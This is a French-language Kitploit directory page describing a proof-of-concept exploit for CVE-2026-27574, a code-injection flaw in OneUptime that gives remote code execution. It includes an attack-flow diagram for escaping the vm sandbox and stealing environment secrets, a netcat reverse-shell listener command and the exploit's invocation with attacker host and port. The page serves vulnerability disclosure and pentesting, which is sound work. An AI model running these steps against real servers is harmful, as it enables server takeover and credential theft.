Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27574-OneUptime-RCE — Preuve de concept d'exploitation pour CVE-2026-27574, une injection de code critique dans OneUptime permettant l'exécution de code à distance et la fuite de variables d'environnement. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Preuve de concept d'exploitation pour CVE-2026-27574, une injection de code critique dans OneUptime permettant l'exécution de code à distance et la fuite de variables d'environnement.

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Aperçu

Preuve de concept (PoC) pour CVE-2026-27574 – une vulnérabilité critique d'injection de code (CWE-94) dans OneUptime < 10.0.0 permettant l'exécution arbitraire de JavaScript dans le contexte du probe, conduisant à une complète et à la fuite de variables d'environnement sensibles.

exécution de code à distance (RCE)

Corrigé dans : OneUptime 10.0.0 (migration vers isolated-vm)

Type d'exploit : À distance
Authentification : Faible privilège (tout membre de projet enregistré)
Impact : Compromission totale du serveur, vol d'identifiants, prise de contrôle du cluster

Schéma du flux d'attaque

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Fonctionnalités de ce PoC

  • Enregistrement automatique de compte
  • Création de projet
  • Création de moniteur JavaScript malveillant
  • Fuite de variables d'environnement
  • Preuve d'exécution de commandes de base
  • Payload de reverse shell optionnel (commenté)

Utilisation

root@kitploit:~
# Démarrer le listener (si reverse shell utilisé)
nc -lvnp 4444

# Exécuter l'exploit
python3 exploit.py http://cible:3002 --lhost VOTRE_IP --lport 4444

Prérequis

  • Python 3.6+
  • Bibliothèque requests (pip install requests)

Avis légal et éthique

Ce code est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.

Références

  • Avis GitHub GHSA-v264-xqh4-9xmm
  • Commit du correctif

Développé par Mohammed Idrees Banyamer • Jordanie • @banyamer_security

Télécharger l’outil